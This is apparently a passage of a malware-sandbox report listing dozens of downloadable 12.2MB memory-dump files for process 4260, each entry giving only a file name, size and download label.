memory/4260-472-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-495-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-465-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-466-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-467-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-468-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-469-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-470-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-471-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-463-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-473-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-474-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-475-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-476-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-477-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-478-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-479-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-480-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-481-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-482-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-483-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-484-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-485-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-486-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-487-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-488-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-489-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-490-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-491-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-492-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-493-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-464-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-496-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-497-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-498-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-499-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-500-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-501-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-502-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-503-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-504-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-505-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-506-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-507-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-508-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-509-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-510-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-511-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-512-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-513-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-514-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-515-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-516-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-517-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-518-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-519-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-520-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-521-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-522-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-523-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4260-524-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download